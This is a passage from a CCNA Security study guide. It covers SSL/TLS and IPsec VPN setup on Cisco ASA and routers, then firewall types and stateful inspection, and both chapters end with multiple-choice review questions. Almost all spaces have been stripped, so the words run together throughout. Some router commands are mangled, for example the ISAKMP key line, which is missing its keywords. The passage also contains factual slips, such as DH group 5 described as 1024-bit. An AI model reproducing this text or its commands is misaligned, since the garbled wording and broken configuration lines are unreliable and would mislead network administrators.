SSL/TLSTransportLayerSecurity(TLS)isusedtoprovidesecurityservicesforboththeclientlessSSLVPNandtheAnyConnectVPN.WhileitspredecessorisSecureSocketsLayer(SSL),thetermSSLVPNhaspersistedandisstillusedtodescribetheconnectioneventhoughmostmodernsystemsuseTLS.Theseprotocolsusepublickeycryptographyanddigitalcertificatesintheiroperation.Whilecertificatescanbedeployedonboththeclientandtheservertoenablemutualauthentication,inmostcasesacertificateisdeployedonlyontheserverbecausethatcansecuretheconnectionaswellaswhencertificatesaredeployedonbothends.
SSL/TLShasagreatdealofflexibilityregardingtheencryptionalgorithms,hashingalgorithms,authenticationmechanisms,andkeymanagementprotocolsthatcanbeused.Figure12.1depictsthechoicesavailableforeachofthesecomponents.
FIGURE12.1SupportedSSL/TLSalgorithms
Itisalsohelpfultounderstandtheprocessthatoccurswhenoneoftheseconnectionsisestablishedbetweentheclientandtheserver.Thestepsthatoccurareasfollows:
1. TheclientinitiatestheprocessbystartingtheexchangeofhellopacketsbetweentheclientandtheVPNgateway(theASA).Thisstepallowsthetwotonegotiateandagreeontheencryptionalgorithms,hashingalgorithms,authenticationmechanisms,andkeymanagementprotocolstobeused.
2. Theservertransmitsitscertificatetotheclient(whichwillincludeitspublickey).IftheRSAkeyexchangealgorithmisinuse,theclientsendsapremasterkeytotheserverusingthepublickeyoftheservertoprotectthetransmission.
3. Ifmutualauthenticationisrequired,theclientthensendsitscertificatetotheserver,asessionkeyiscalculated,andtheciphersuiteisactivated.Integritywillbeprovidedbytheselectedhashingalgorithm(MD5orSHA-1),andencryptionwillbeprovidedbytheselectedcipher(RC4,3DES,AES,orIDEA).
4. Oncethesessionkeysareexchanged,thedatatransferbegins.WhenthetrafficgetsbeyondtheASA,theinformationwillbeincleartextbutwillbeencryptedbetweentheclientandtheASA.
ConfigurationWhenusingtheCiscoclientlessSSLVPN,theremotedeviceusesthebrowsertoconnecttoanSSL-enabledwebsiteontheASAoronaCiscorouter.Oncethesecurityappliancehasauthenticatedtheuser,theservercertificateisusedtoestablishtheSSLtunnel.Thenthesecurityappliancepresentstheuserwithawebportalthatcontainsalinktotheinternalresourcesthathavebeenmadeavailable.
Fromahighlevel,thestepstobecompletedtoconfiguretheCiscoclientlessSSLVPNareasfollows:
1. EnableclientlessSSLVPNtrafficterminationonanASAinterface.
2. ConfigureclientlessSSLserverauthenticationbyprovisioninganidentitycertificateandattachingittotheinterface.
3. Configureuserauthentication,whichcomprisesthreesubtasks.
a. CreateaccountsfortheVPNusers.
b. ConfigureagrouppolicyfortheVPNusersspecifyinginthepolicyclientlessSSLVPNasthetunnelingprotocol.
c. CreateaconnectionprofilefortheVPNusersandconnectthepolicytotheprofile.
4. Setupbookmarksthatwillappearwhentheusersconnecttothewebportal.
ConfiguringClientlessSSLVPNInthisprocedure,youwillconfigureaclientlessSSLVPNusingthelocaluserdatabaseoftheASA.
1. IntheASDM,navigatetoWizards VPNWizards ClientlessSSLVPNWizard.
2. OntheStep1pageofthewizard,provideaninformationaldescriptionfortheconnectionandclickNext.
3. WhentheStep2pageappears,givetheconnectionprofileanameintheConnectionProfileNamebox.Justbelowthat,selecttheinterfacethatwillhosttheconnectionandclickNext.
4. IntheStep3dialogbox,selecttheAuthenticateUsingTheLocalUserDatabaseradiobutton.ClicktheAddbuttonandcreateauseraccountfortheuser,specifyingbothausernameandapassword.ThenclickNext.
5. OntheStep4pageofthewizard,createagrouppolicyfortheuserbyselectingtheCreateANewGroupPolicyradiobuttonandgivethepolicyaname.ThenclickNext.
6. IntheStep5dialogbox,youwillcreateabookmarklistandthenaddbookmarkstothelist.JusttotherightoftheBookmarksListfield,clicktheManagebutton.TheConfigureGUIcustomizationdialogboxappears.ClicktheAddbutton,andwhentheAddBookmarkListdialogboxappears,givethebookmarklistaname.ThenclicktheAddbuttoninthisdialogbox.WhentheSelectBookmarkTypedialogboxappears,accepttheURLwiththeGETorPOSTmethodoptionandclickOK.
7. Nowyouwilladdabookmarkforawebresourceyouwillmakeavailable.IntheAddBookmarkdialogbox,givethebookmarkaname,selecttheHTTPprotocol,andentertheIPaddressoftheserverprovidingthisresource.Whenyouhaveaddedallthebookmarksyouneedonthispage,clickOK.
8. OntheConfigureGUICustomizationpage,clickOK.
9. IntheStep5window,ensurethatyourbookmarklistisselectedandclickNext.
10. ReviewthesummaryPage6windowandclickFinish.
VerifyaClientlessConnectionNaturallythemosteffectivewaytoverifytheproperconfigurationoftheclientlessSSLVPNistoensurethataconnectioncanbemade.Thisinvolvesthefollowing:
1. ConnectingtothesiteURL
2. Specifyingthegroupconfiguredfortheuser
3. Enteringthenameandthepasswordfortheuser
4. Verifyingthatthebookmarksappearwhenauthenticationiscomplete
5. Testingthebookmarkstoensurethattheyconnecttothecorrectresource
BasicAnyConnectSSLVPNUsingASDMToutilizeaCiscoAnyConnectSSLVPN,aVPNclientcalledtheAnyConnectclientmustbeinstalledontheuserdevice.Whenconfiguringtheconnection,youwillmakethisclientavailabletobedownloadedandinstalledontheuserdevicethefirsttimetheuserconnects,makingamanualinstallationoftheclientunnecessary.
Fromahighlevel,thestepstobecompletedtoconfiguretheCiscoAnyConnectSSLVPNareasfollows:
1. CreateaconnectionprofileandattachittotheexternalinterfaceoftheASA.
2. Generateaself-signedcertificatefortheASA(oruseanexistingoneifitexistsalready).
3. MaketheAnyConnectclientavailablefordownloadwhentheuserconnects.
4. CreateanaccountandpasswordfortheuserontheASA.
5. CreateapoolofIPaddressesthatcanbeissuedtoAnyConnectclients.
6. ExempttheinternalnetworkfromtheNATprocess.
7. SelecttoallowtheweblaunchoftheAnyConnectclient.
8. Createagrouppolicyfortheremoteaccessconnectionandassignittotheuser.
ConfiguringAnyConnectSSLVPNInthisprocedure,youwillconfigureanAnyConnectSSLVPNusingthelocaluserdatabaseoftheASA.
1. IntheASDMwindow,navigatetoWizards VPNWizards AnyConnectVPNWizard.Whenthewizardopens,clickNextonthefirstpage.
2. Next,ontheConnectionProfileIdentificationpage,enteraprofilenamefortheconnectionprofileandensurethatVPNAccessInterfaceissettotheInternetinterface.
3. OntheVPNProtocolpage,selectSSL.IntheDeviceCertificateWithRSAKeydrop-downbox,selectanexistingcertificateorclickManageandgenerateacertificate.
4. OntheClientImagespage,clicktheAddbutton.IntheAddAnyConnectClientImagewindow,clicktheUploadbutton.BrowsetothelocationoftheAnyConnectimagefileandselectthe.pkgversion.VerifytheselectionbyclickingSelect,UploadFile,OK,andOK.
5. OntheAuthenticationMethodspage,createausernameandpasswordfortheuser.
6. OntheClientAddressAssignmentpage,clickNewandcreateascopeofIPaddressestobeavailabletotheAnyConnectclients.
7. OntheNetworkResolutionpage,entertheIPaddressofaDNSserver.
8. OntheNATExemptpage,iftheASAisalsoperformingNAT,selecttheExemptVPMTrafficFromNetworkAddressTranslationcheckbox.ClickNext.
9. FortheAnyConnectClientDeploymentstep,selectAllowWebLaunch.
10. OntheSummarypage,reviewyoursettingsandclickFinish.
VerifyanAnyConnectConnectionAgain,themosteffectivewaytoverifytheproperconfigurationoftheAnyConnectSSLVPNistoensurethataconnectioncanbemadeandthattheclientinstallsandallowsfullVPNaccess.Thisinvolvesthefollowing:
1. ConnectingtothesiteURL
2. Specifyingthegroupconfiguredfortheuser
3. Enteringthenameandthepasswordfortheuser
4. EnsuringthattheuserisofferedtheoptiontoinstalltheAnyConnectclient
5. Ensuringtheclientsuccessfullyinstalls
6. EnsuringthattheuserisgivenfulltunnelVPNaccesstothenetwork
EndpointPostureAssessment
TheCiscoAnyConnectclientalsoincludesmodulesthatcanenhanceitscapabilities.TwoofthesemodulesaretheASAPosturemoduleandISEPosturemodule.Bothmodulesoffertheabilitytoaccessanendpoint’scompliancewithrequirementsregardingoperatingsystemversion,antivirusupdates,andothersecurity-relatedissuesthroughanendpointpostureassessment.Thisgivesyoutheabilitytoverifythesecurityposturebeforeallowingthedeviceaccesstothenetwork.
WhiletheASAmoduleperformsaserver-sideassessment,ISEsendsthepolicyrequirementstotheendpoint,wheretheassessmentthenoccurs.TheASAmodulecollectsthehealthinformationintheformofattributesandsendsthemtotheASA,wheretheassessmentoccurs.
Bothsystemscandenyaccesstotheendpointsthatfailtheassessment,andbothofferremediationcapabilitiesaswell.RemediationwiththeASAmoduleislimitedtoworkingwiththesoftwarepresentontheendpoint,meaningitcanenable,disable,orupdatethatsoftware.ISEquarantinesthedeviceanddirectsittoserversthatremediatetheissues.Onlythenistheendpointallowedfullaccesstothenetwork.
ConfiguringSite-to-SiteVPNsSite-to-siteVPNconnectionshaveanendpointinonelocationorofficeandanotherendpointinanotheroffice.WhilebothSSLandIPseccanbeusedfortheseVPNs,thissectionwillfocusontheIPsecsite-to-siteVPN.Also,whiletheauthenticationcanbedonewithothermeans,wewillfocusontheuseofapresharedkey.
ImplementanIPsecSite-to-SiteVPNwithPresharedKeyAuthenticationACiscoIPsecsite-to-siteVPNcanbeconfiguredonanASAusingtheASDM,oritcanbesetuponaCiscorouter.Youwilllearnaboutbothmethodsinthefollowingsections.Followingthis,youwilllearnhowtoverifytheconfiguration.Forbothprocesses,thehigh-levelstepsrequiredareasfollows:
1. EnsurethatallACLsarecompatiblewithIPsec.
2. ConfigureanISAKMPpolicythatcontainstheISAKMPparameters.
3. DefinetheIPsectransformset,whichincludestheencryptionandintegrityalgorithms.
4. CreateacryptoACLthatdefinesthetraffictypestobesentandprotectedthroughthetunnel.
5. Createacryptomapthatdefinesthepeers,appliestheparametersofthecryptoACLtothem,andappliesthecryptoACLtotheinterface.
CiscoRoutersHereyouwilllearnhowtodotheimplementation.
ImplementanIPsecSite-to-SiteVPNwithPresharedKeyAuthenticationwithaCiscoRouterInthisprocedure,youwillimplementanIPsecsite-to-siteVPNwithpresharedkeyauthenticationwithaCiscorouter.
1. Executetheshowruncommandandlocatethesectionfortheinterfacewheretheconnectionwillbeconfigured.ExaminetheACLappliedtothatinterfaceifoneexists.Ensurethatthefollowingpermitstatementsarepresentand,ifnotpresent,applythemtothelist,takingcaretosequencethemintheproperlocation:
permitahphostipaddressofthepeerrouterhostipaddressofthe
localrouter
permitesphostipaddressofthepeerrouterhostipaddressofthe
localrouter
permitudphostipaddressofthepeerrouterhostipaddressofthe
localroutereqisakmp
permitudphostipaddressofthepeerrouterhostipaddressofthe
localroutereqnon500-isakmp
2. NowdefineanISAKMPpolicyandnumberit111.Whenyouaredone,thepromptwillchange,andthenextcommandswillbepartofthepolicy.
Router70(config)#cryptoisakmppolicy111
3. Nowcompletethepolicyspecifyingthefollowingsettings:
Authentication:presharedkey
Encryptionalgorithm128-bitAES
1024-bitDiffie-Hellmanforkeyexchange(specifygroup5)
SHAalgorithmforintegrity
SecurityAssociationlifetime1day(86400seconds)
Usethefollowingcommandsforthis:
Router70(config-isakmp)#authenticationpre-share
Router70(config-isakmp)#encryptionaes128
Router70(config-isakmp)#group5
Router70(config-isakmp)#hashsha
Router70(config-isakmp)#lifetime86400
EnsurethatthepeerrouterhasatleastoneISAKMPpolicythatincudesthesesettings.RememberthatpolicynamesandPSKsarecase-sensitive.
4. SpecifytheISAKMPkeyandtheIPaddressofthepeerrouterattheglobalconfigurationprompt.Inthiscase,thepeerisat102.168.5.3,andthePSKisMAC321.
Router70(config)#cryptoisakmpMAC321102.168.5.3
5. ConfiguretheIPsectransformsetbyspecifyingthefollowing:
Transformsetname:AES_SHA
Mechanismforpayloadauthentication:ESPHMAC
Mechanismforpayloadencryption:ESP
IPsecmode:tunnel(defaultstotunnel)
Usethefollowingcommandsforthis:
Router70(config)#cryptoipsectransform-setAES_SHAesp-aesesp-sha-
hmac
6. CreateacryptoACL(anextendedaccesslist)thatspecifiestheinboundandoutboundtrafficthatIPsecshouldprotect.Inthiscase,protectallTCPtraffic.ItwillbespecifiedusingthesourcenetworkIDandthedestinationnetworkIDusingwildcardmasks.Thesourcenetworkis10.0.2.0/24,andthedestinationis10.0.1.0/24.
Router70(config)#access-list110permittcp10.0.2.00.0.0.255
10.0.1.00.0.0.255
7. CreateacrytpomapthatspecifiestheACLnumber110,thetransformsetname,andtheIPsecpeer.UseamapnameofmymapandsettheSAlifetimeto86400.
Router70(config)#cryptomapmymap10ipsec-isakmp
Router70(config-crypto-map)#matchaddress110
Router70(config-crypto-map)#setpeer102.168.5.3
Router70(config-crypto-map)#settransform-setAES_SHA
Router70(config-crypto-map)#setsecurity-associationlifetime86400
8. ApplythecryptomaptotheinterfaceSerial0/1.
Router70(config)#ints0/1
Router70(config)#cryptomapmymap
ASAFirewallsWhenconfiguringasite-to-siteVPNbetweentwoASAfirewalls,youwillinmostcasesmakeuseoftheASDM.Therefore,youwilllearntheprocedurefordoingthis.
ImplementanIPsecSite-to-SiteVPNwithPresharedKeyAuthenticationonASAwiththeASDMInthisprocedure,youwillimplementanIPsecsite-to-siteVPNwithpresharedkeyauthenticationonASA.
1. IntheASDM,navigatetoWizards VPNWizards Site-to-SiteVPNWizard.OntheIntroductionscreen,clickNext.
2. OnthePeerDeviceIdentificationscreen,entertheIPaddressofthepeerASAdeviceandselecttheexternalinterfaceleadingtothepeer.ClickNext.
3. OntheTrafficToProtectscreen,enterthenetworkIDofthelocalnetworkintheLocalNetworkfieldandthenetworkIDoftheremotenetworkintheRemoteNetworkfield.ClickNext.
4. IntheSecuritypanel,selectSimpleConfigurationandenterthepresharedkeyfortheconnection.
5. OntheNATExemptpage,iftheASAisalsoperformingNAT,selecttheExemptVPNTrafficFromNetworkAddressTranslationcheckbox.ThenclickNext.
6. IntheSummarywindow,verifyyourselections.Whensatisfied,selectFinish.
VerifyanIPsecSite-to-SiteVPNRegardlessofthemethodusedtosetupthesite-to-siteVPN,theverificationmethodisthesame.Youneedtogenerateinterestingtrafficfromoneofthesitestotheotherandverifythattheconnectionisfunctional.Inthesetwoexamples,alltrafficisinterestingtraffic,soallyouneeddoispingfromadeviceinonelocationtoadeviceintheotherlocation.Ifthepingsucceeds,theconnectionisworking.Ifthefirstpingfails,tryagainandkeepinmindthatittakessometimetonegotiatethesecurityoftheSA.
SummaryInthischapter,youlearnedthevalueoftheCiscoclientlessSSLVPNandthestepsrequiredtoconfigureit.ThechapteralsodiscussedanalternativetothisVPNtype,theCiscoAnyConnectSSLVPN,whichprovidesafull-tableexperiencebutrequiresclientsoftwareontheuser’sdevice.YoualsolearnedaboutmodulesintheCiscoAnyConnectclientthatcanprovideendpointpostureassessment.Finally,thechaptercoveredhowtoimplementanIPsecsite-to-siteVPNwithpresharedkeyauthentication.
ExamEssentialsIdentifythestepstobecompletedtoconfiguretheCiscoclientlessSSLVPN.ThesestepsarefirsttoenableclientlessSSLVPNtrafficterminationonanASAinterfaceandthento
configureclientlessSSLserverauthenticationbyprovisioninganidentitycertificateandattachingittotheinterface.Nextconfigureuserauthenticationandfinallycreatebookmarksforthelinkstotheresourcesthatwillappearwhentheusersconnecttothewebportal.
ListthestepstobecompletedtoconfiguretheCiscoAnyConnectSSLVPN.Thesestepsincludethefollowing:CreateaconnectionprofileandattachittotheexternalinterfaceoftheASA.Generateaself-signedcertificatefortheASA(oruseanexistingoneifitexistsalready).GenerateanidentitycertificatefortheASAandattachittothekeypair.MaketheAnyConnectclientavailablefordownloadwhentheuserconnects.CreateanaccountandpasswordfortheuserontheASA.CreateapoolofIPaddressesthatcanbeissuedtoAnyConnectclients.ExempttheinternalnetworkfromtheNATprocess.SelecttoallowtheweblaunchoftheAnyConnectclient.Createagrouppolicyfortheremoteaccessconnectionandassignittotheuser.
Describethecomponentsthatprovideendpointpostureassessment.TheCiscoAnyConnectclientalsoincludesmodulesthatcanenhanceitscapabilities.TwoofthesemodulesaretheASAPosturemoduleandtheISEPosturemodule.Bothmodulesoffertheabilitytoaccessanendpoint’scompliancewithrequirementsregardingoperatingsystemversion,antivirusupdates,andothersecurity-relatedissues.Thisgivesyoutheabilitytoverifythesecurityposturebeforegivingthedeviceaccesstothenetwork.
ListthestepstoimplementanIPsecsite-to-siteVPNwithpresharedkeyauthentication.Thesestepsincludethefollowing:EnsurethatallACLsarecompatiblewithIPsec.ConfigureanISAKMPpolicythatcontainstheISAKMPparameters.DefinetheIPsectransformset,whichincludestheencryptionandintegrityalgorithms.CreateacryptoACLthatdefinesthetraffictypestobesentandprotectedthroughthetunnel.Createacryptomapthatdefinesthepeers,appliestheparametersofthecryptoACLtothem,andappliesthecryptoACLtotheinterface.
ReviewQuestions1. WhichconfidentialityalgorithmisnotsupportedforanSSL/TLSVPN?
A. DES
B. 3DES
C. AES
D. RC4
2. InanSSL/TLSVPN,whatfunctioncantheDSAalgorithmbeusedfor?
A. Authentication
B. Integrity
C. Confidentiality
D. Keymanagement
3. IntheSSLconnectionprocess,whichstepoccurslast?
A. Sessionkeysareexchanged.
B. Theservertransmitsitscertificatetotheclient.
C. Theclientsendshellopackets.
D. Theclientsendsitscertificatetotheserver.
4. WhichofthefollowingisnotasubtaskofconfiguringuserauthenticationforaCiscoclientlessSSLVPNconnection?
A. CreateaconnectionprofilefortheVPNusers
B. ConfigureagrouppolicyfortheVPNusers
C. CreateaccountsfortheVPNusers
D. Createbookmarksforthelinkstotheresources
5. Whichofthefollowingisfalseregardinganendpointpostureassessment?
A. TheISEmoduleperformsaserver-sideassessment.
B. BothISEandASAposturemodulesoffertheabilitytoaccessanendpoint’scompliance.
C. Bothsystemscandenyaccesstotheendpointsthatfailtheassessment,andbothofferremediationcapabilities.
D. TheISEquarantinesanoncompliantdeviceanddirectsittoserversthatremediatetheissues.
6. WhenimplementinganIPsecsite-to-siteVPN,inwhichsteparetheencryptionandintegrityalgorithmsdefined?
A. Creatingacryptomap
B. CreatingacryptoACL
C. DefiningtheIPsectransformset
D. SpecifyingtheISAKMPkey
7. Whichofthefollowingcommandsspecifiedthedetailsofthekeyexchangealgorithm?
A. Router70(config-isakmp)#lifetime86400
B. Router70(config-isakmp)#encryptionaes128
C. Router70(config-isakmp)#group5
D. Router70(config-isakmp)#authenticationpre-share
8. Inthefollowingcommand,whatdoesthenumber10represent?
Router70(config)#cryptomapmymap10ipsec-isakmp
A. Sequencenumber
B. ACLnumber
C. Mapname
D. SAlifetime
9. Whichofthefollowingispossiblewhencertificatesarepresentonboththeclientandtheserver?
A. Hairpinning
B. Mutualauthentication
C. Onlinecertificateverification
D. Splittunneling
10. WhichofthefollowingisnotapossibleauthenticationmechanismavailableintheSSLVPN?
A. RSA
B. CHAP
C. DSA
D. EC
11. Whichofthefollowingwillbeincludedinthecertificatetheserverpresentstotheclient?
A. PSK
B. Privatekey
C. Transformset
D. Publickey
12. Whatstepmakessecuredataexchangepossible?
A. Exchangeofhellos
B. Exchangeofsessionkeys
C. Exchangeofcertificates
D. Exchangeofcredentials
13. InwhichtypeofVPNdoestheuserusethebrowsertoconnecttoanSSL-enabledwebsite?
A. AnyConnect
B. Clientless
C. IPsecwithpresharedkey
D. IPsecsite-to-site
14. WhatisthefunctionoftheMD5algorithmintheSSLVPNprocess?
A. Authentication
B. Integrity
C. Confidentiality
D. Keyexchange
15. Whichofthefollowingdefinesthetraffictypestobesentandprotectedthroughthetunnel?
A. Cryptomap
B. CryptoACL
C. IPsectransformset
D. ISAKMPkey
16. Whatdoesthefollowingcommandcontrol?Router70(config-isakmp)#lifetime86400
A. Authenticationtimeout
B. SAlifetime
C. PSKlifetime
D. Inactivitytimer
17. Inthefollowingcommand,whatdoesAES_SHAdefine?Router70(config)#cryptoipsectransform-setAES_SHAesp-aesesp-sha-hmac
A. Thenameofthetransformset
B. Themechanismforthepayloadauthentication
C. Themechanismforthepayloadencryption
D. Thetunnelmode
18. WhichofthefollowingisnotasupportedkeymanagementalgorithminanSSLVPN?
A. MD5
B. Quantum
C. DH
D. ECC
19. WhatVPNmethodrequiressoftwareontheuserdevice?
A. IPsecsite-to-site
B. AnyConnect
C. Clientless
D. IPsecwithPSK
20. Whatstatementisfalseregardingendpointpostureassessment?
A. TheISEmodulequarantinesanoncompliantdeviceanddirectsittoserversthatremediatetheissues.
B. TheISEmoduleislimitedtoworkingwiththesoftwarepresentontheendpoint.
C. Bothsystemscandenyaccesstotheendpointsthatfailtheassessment.
D. TheASAmoduleperformsaserver-sideassessment.
Chapter13UnderstandingFirewallsCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
5.1Describeoperationalstrengthsandweaknessesofthedifferentfirewalltechnologies
Proxyfirewalls
Applicationfirewall
Personalfirewall
5.2Comparestatefulvs.statelessfirewalls
Operations
Functionofthestatetable
Firewallsarepartofthefoundationofsecurityinanetwork.Theyprotectthenetworkperimeterandcontrolaccessbetweensecurityzoneswithinyournetworks.Youwillalsotypicallydeployfirewallsinlayers,meaningyouwillplacefirewallsoneachdevice.Firewallsdifferinthewaytheyexaminethetraffictheyaredesignedtocontrolandintheeffecttheyhaveonnetworkperformance.
Inthischapter,youwilllearnthefollowing:
Theoperationalstrengthsandweaknessesofthedifferentfirewalltechnologies
Thefunctionsofstatefulandstatelessfirewalls
UnderstandingFirewallTechnologiesFirewallscomewitharangeofabilitiesandgoabouttheirjobsindifferentwaysdependingonthejobforwhichtheyweredesigned.TheycandifferintheOSIlayeronwhichtheyoperateandinthetypesofactionstheycantakeandtheattacktypestheycanmitigate.Inthissection,you’lllearnaboutavarietyofthesedevices.Inthesectionfollowingthisone,you’lllookatonefirewallcapabilitythatdeservesasectionallitsown.
PacketFiltering
PacketfilteringfirewallsaretheleastdetrimentaltothroughputbecausetheyonlyinspecttheheaderofthepacketforallowedIPaddressesorportnumbers.Althoughevenperformingthisfunctionwillslowtraffic,itinvolvesonlylookingatthebeginningofthepacketandmakingaquickallowordisallowdecision.
Althoughpacketfilteringfirewallsserveanimportantfunction,theycannotpreventmanyattacktypes.TheycannotpreventIPspoofing,attacksthatarespecifictoanapplication,attacksthatdependonpacketfragmentation,orattacksthattakeadvantageoftheTCPhandshake.Moreadvancedinspectionfirewalltypesarerequiredtostoptheseattacks.
ProxyFirewallsProxyfirewallsstandbetweeneachconnectionfromtheoutsidetotheinsideandmaketheconnectiononbehalfoftheendpoints.Therefore,thereisnodirectconnection.Theproxyfirewallactsasarelaybetweenthetwoendpoints.ProxyfirewallscanoperateattwodifferentlayersoftheOSImodel.Botharediscussedshortly.
Circuit-levelproxiesoperateattheSessionlayer(layer5)oftheOSImodel.TheymakedecisionsbasedontheprotocolheaderandSessionlayerinformation.Becausetheydonotdodeeppacketinspection(atlayer7ortheApplicationlayer),theyareconsideredapplication-independentandcanbeusedforwiderangesoflayer7protocoltypes.
ASOCKSfirewallisanexampleofacircuit-levelfirewall.ThisrequiresaSOCKSclientonthecomputers.ManyvendorshaveintegratedtheirsoftwarewithSOCKStomakeusingthistypeoffirewalleasier.
Akernelproxyfirewallisanexampleofafifth-generationfirewall.ItinspectsthepacketateverylayeroftheOSImodelbutdoesnotintroducetheperformancehitthatanApplicationlayerfirewallwillbecauseitdoesthisatthekernellayer.Italsofollowstheproxymodelinthatitstandsbetweenthetwosystemsandcreatesconnectionsontheirbehalf.
Proxyserverscanbeappliances,ortheycanbesoftwarethatisinstalledonaserveroperatingsystem.Theseserversactlikeaproxyfirewallinthattheycreatethewebconnectionbetweensystemsontheirbehalf,buttheycantypicallyallowanddisallowtrafficonamoregranularbasis.Forexample,aproxyservermightallowtheSalesgrouptogotocertainwebsiteswhilenotallowingtheDataEntrygroupaccesstothesesamesites.ThefunctionalityextendsbeyondHTTPtoothertraffictypes,suchasFTPandothers.
Proxyserverscanprovideanadditionalbeneficialfunctioncalledwebcaching.Whenaproxyserverisconfiguredtoprovidewebcaching,itsavesacopyofallwebpagesthathavebeendeliveredtointernalcomputersinawebcache.Ifanyuserrequeststhesamepagelater,theproxyserverhasalocalcopyandneednotspendthetimeandefforttoretrieveitfromtheInternet.Thisgreatlyimproveswebperformanceforfrequentlyrequestedpages.
ApplicationFirewallApplication-levelproxiesperformdeeppacketinspection.Thistypeoffirewallunderstands
thedetailsofthecommunicationprocessatlayer7fortheapplicationofinterest.Anapplication-levelfirewallmaintainsadifferentproxyfunctionforeachprotocol.Forexample,forHTTPtheproxywillbeabletoreadandfiltertrafficbasedonspecificHTTPcommands.Operatingatthislayerrequireseachpackettobecompletelyopenedandclosed,makingthisfirewallthemostimpactfulonperformance.
PersonalFirewallPersonalfirewallsmaybethosethatcomewithanoperatingsystemliketheWindowsFirewall,ortheymaybethird-partyhostfirewallssuchasKasperskyInternetSecurityorZoneAlarmProFirewall.Thesefirewalls,calledeitherhostorpersonalfirewalls,protectonlythedeviceonwhichthesoftwareisinstalled.
Whileneverareplacementforproperlypositionednetworkfirewalls,theyareanexcellentcomplementtotheprotectionprovidedbythenetworkfirewalls,andinstallingbothtypesoffirewallsisanexampleofexercisingtheconceptofdefenseindepth.Thisconceptprescribesthatyoushouldalwaysdeploymultiplebarrierstounauthorizedaccess.
Onekeyfeaturethatapersonalfirewallcanprovide(althoughinmanycasesthisisnotconfiguredbydefault)istheabilitytocontrolegresstraffic.Thisistrafficleavingthedeviceandcanhelptopreventmalwarethat“callshome”toacommand-and-controlserverfromfunctioning.Thesefirewallscanalsohelpprotectsystemsfromothersystemsinsidethenetworkperimeter.
Statefulvs.StatelessFirewallsOnekeytypeoffirewallthatwesavedfortheendofthischapterisastatefulfirewall.StatefulfirewallsarethosethatareawareoftheproperfunctioningoftheTCPhandshake,keeptrackofthestateofallconnectionswithrespecttothisprocess,andcanrecognizewhenpacketsaretryingtoenterthenetworkthatdon’tmakesenseinthecontextoftheTCPhandshake.Justasareview,Figure13.1showstheprocess.
FIGURE13.1TCPthree-wayhandshake
Inthisprocess,apacketshouldneverarriveatafirewallfordeliverythathasboththeSYNflagandtheACKflagsetunlessitispartofanexistinghandshakeprocess,anditshouldbeinresponsetoapacketsentfrominsidethenetworkwiththeSYNflagset.Thisisthetypeofpacketthatthestatefulfirewallwoulddisallow.Italsocanrecognizeotherattacktypesthatattempttomisusethisprocess.Itdoesthisbymaintainingastatetableaboutallcurrentconnectionsandthestatusofeachconnectionprocess.Thisallowsittorecognizeanytrafficthatdoesn’tmakesensewiththecurrentstateoftheconnection.Ofcourse,maintainingthistableandreferencingthetablecausesthisfirewalltypetohavemoreofaneffectonperformancethanapacketfilteringfirewall.
OperationsFigure13.2showstheoperationofastatefulfirewall.
FIGURE13.2Statefulfirewalloperation
ThedeviceC1ontherightissendingaSYNpackettothedeviceH1.Thefirewallpermittedandrecordedthatoperationinitsstatetableandwillmonitorthattablewheneverapacketarrivesatthefirewalltoensurethatanypacketspermittedeitherareconnectionrequestsfromtheinside(SYNpacketsonly)orarepartofanexistingconnectionandthatallrulesofthehandshakeareenforced.Forexample,inthescenario,apacketfromtheoutsidedestinedforC1fromH1withanACKflagsetwouldberejectedbecausethenextexpectedpackettypeinthehandshakewouldbeapacketwiththeSYNandACKflagsset.
StateTableThestatetableisusedtomonitorallallowedconnections.Thefollowingarethekeyitemsthataretypicallyrecordedbyastatefulfirewallwithrespecttoeachconnection:
SourceIPaddress
Sourceportnumber
DestinationIPaddress
Destinationportnumber
IPProtocol
Flags
Timeout
SummaryInthischapter,youlearnedaboutvariousfirewalltechnologiessuchasproxy,application,personal,andstatefulfirewalls.Youlearnedtheirstrengthandweaknesses.Youalsolearned
aboutstatefulfirewallsingreaterdetailanddescribedtherelationshipbetweentheoperationofthesefirewallsandtheTCPthree-wayhandshake.Finally,youlearnedwhatiscontainedinthestatetableofastatefulfirewall.
ExamEssentialsIdentifytheoperationalstrengthandweaknessesoffirewalltechnologies.Theseincludeproxy,application,personal,andstatefulfirewalls.Describeeachtechnology’simpactonperformanceandthefeaturesthateachprovides.
DescribetherelationshipbetweentheTCPthree-wayhandshakeandstatefulfirewalls.Statefulfirewallsunderstandthethree-wayhandshakeandcanrecognizeillegalpacketsthatdon’tmakesenseintheTCPconnectionprocess.
Identifycontentsofastatetable.Keyitemsthataretypicallyrecordedbyastatefulfirewallwithrespecttoeachconnectionaresourceportnumber,destinationIPaddress,destinationportnumber,IPprotocol,flags,andtimeout.
ReviewQuestions1. Whichfirewalltechnologyistheleastdetrimentaltoperformance?
A. Proxy
B. Stateful
C. Packetfiltering
D. SOCKS
2. Whichfirewalltypeoperatesatthesessionlayer?
A. Circuit-levelproxy
B. Stateful
C. Packetfiltering
D. SOCKS
3. Whichstatementistrueofakernel-levelproxy?
A. OperatesattheTransportlayer
B. Consideredafifth-generationfirewall
C. Maintainsastatetable
D. Examinesonlytheheader
4. Whichofthefollowingisnotaproxyfirewall?
A. Kernel
B. Circuit-level
C. SOCKS
D. Application
5. WhichtypeoffirewallisZoneAlarmProFirewall?
A. Personal
B. Stateful
C. Packetfiltering
D. SOCKS
6. Whichvalueforeachconnectionisnotcontainedinthestatetableofastatefulfirewall?
A. DestinationMACaddress
B. SourceIPaddress
C. DestinationIPaddress
D. Flags
7. Youhaveselectedafirewallthatperformsdeeppacketinspectionbutalsocreatesaperformancehitonthroughput.Whattypedidyouselect?
A. Personal
B. Applicationlevel
C. Packetfiltering
D. SOCKS
8. Whichalsooffersthebenefitofwebpagecaching?
A. Personalfirewalls
B. Application-levelfirewalls
C. Proxyservers
D. SOCKSfirewalls
9. AtwhatlayeroftheOSImodeldocircuit-levelproxiesoperate?
A. Network
B. Transport
C. Application
D. Session
10. WhichofthefollowingismostsusceptibletoIPspoofingattacks?
A. Packet-filteringfirewalls
B. Application-levelfirewalls
C. Proxyservers
D. SOCKSfirewalls
11. WhichofthefollowingwillbeabletoreadandfiltertrafficbasedonspecificHTTPcommands?
A. Packet-filteringfirewalls
B. Application-levelfirewalls
C. Proxyservers
D. SOCKSfirewalls
12. WhatistheonlylegitimateresponsetoapacketwiththeSYNflagset?
A. SYN/FIN
B. ACK
C. SYN/ACK
D. FIN
